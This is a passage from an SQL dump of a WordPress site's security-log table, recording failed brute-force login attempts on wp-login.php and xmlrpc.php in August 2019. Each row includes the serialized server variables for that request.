empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"202.92.6.147\";s:11:\"REMOTE_PORT\";s:5:\"33860\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQQYb1aWYDq8nYusQUb3QAAARg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566838881.1776\";s:12:\"REQUEST_TIME\";s:10:\"1566838881\";}}','notice','2019-08-26 17:01:22','2019-08-26 17:01:21',17686024,19176664,'https://bintara.com.my/wp-login.php',1,0,'202.92.6.147'),(23165,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"52.176.91.137\";s:11:\"REMOTE_PORT\";s:5:\"37860\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQRd4Retx8xvefGxXo-tQAAAFI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566839159.7114\";s:12:\"REQUEST_TIME\";s:10:\"1566839159\";}}','notice','2019-08-26 17:06:04','2019-08-26 17:06:00',17688568,19179736,'https://bintara.com.my/wp-login.php',1,0,'52.176.91.137'),(23166,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.71.93.181\";s:11:\"REMOTE_PORT\";s:5:\"45660\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQV1hTEVi0fEJEHuDY7HwAAAAc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566840279.5253\";s:12:\"REQUEST_TIME\";s:10:\"1566840279\";}}','notice','2019-08-26 17:24:40','2019-08-26 17:24:39',17685176,19175448,'https://bintara.com.my/wp-login.php',1,0,'167.71.93.181'),(23167,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.71.93.181\";s:11:\"REMOTE_PORT\";s:5:\"45902\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQV2hTEVi0fEJEHuDY7IgAAAAs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566840282.4545\";s:12:\"REQUEST_TIME\";s:10:\"1566840282\";}}','notice','2019-08-26 17:24:44','2019-08-26 17:24:42',18200352,19498600,'https://bintara.com.my/xmlrpc.php',1,0,'167.71.93.181'),(23168,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"107.170.138.54\";s:11:\"REMOTE_PORT\";s:5:\"59568\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQXlhTEVi0fEJEHuDY76gAAAAo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566840726.4794\";s:12:\"REQUEST_TIME\";s:10:\"1566840726\";}}','notice','2019-08-26 17:32:07','2019-08-26 17:32:06',17683872,19173792,'https://bintara.com.my/wp-login.php',1,0,'107.170.138.54'),(23169,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"134.209.216.249\";s:11:\"REMOTE_PORT\";s:5:\"56006\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQa-BTEVi0fEJEHuDY9vQAAABg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566841596.9615\";s:12:\"REQUEST_TIME\";s:10:\"1566841596\";}}','notice','2019-08-26 17:46:38','2019-08-26 17:46:37',17685456,19175992,'https://bintara.com.my/wp-login.php',1,0,'134.209.216.249'),(23170,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"128.199.134.25\";s:11:\"REMOTE_PORT\";s:5:\"36803\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQbBh90bn5mtr-PXqqxqAAAAFY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566841606.8079\";s:12:\"REQUEST_TIME\";s:10:\"1566841606\";}}','notice','2019-08-26 17:46:47','2019-08-26 17:46:47',17683656,19173304,'https://bintara.com.my/wp-login.php',1,0,'128.199.134.25'),(23171,0,'brute_force','invalid-login::username--','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:1:\"-\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"469\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"134.209.216.249\";s:11:\"REMOTE_PORT\";s:5:\"59588\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQbEB90bn5mtr-PXqqxqwAAAEQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566841616.7556\";s:12:\"REQUEST_TIME\";s:10:\"1566841616\";}}','notice','2019-08-26 17:46:57','2019-08-26 17:46:57',18203912,19502784,'https://bintara.com.my/xmlrpc.php',1,0,'134.209.216.249'),(23172,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"159.89.168.219\";s:11:\"REMOTE_PORT\";s:5:\"48494\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQc5RTEVi0fEJEHuDY@2wAAAAY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566842085.3985\";s:12:\"REQUEST_TIME\";s:10:\"1566842085\";}}','notice','2019-08-26 17:54:46','2019-08-26 17:54:45',17686168,19176544,'https://bintara.com.my/wp-login.php',1,0,'159.89.168.219'),(23173,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 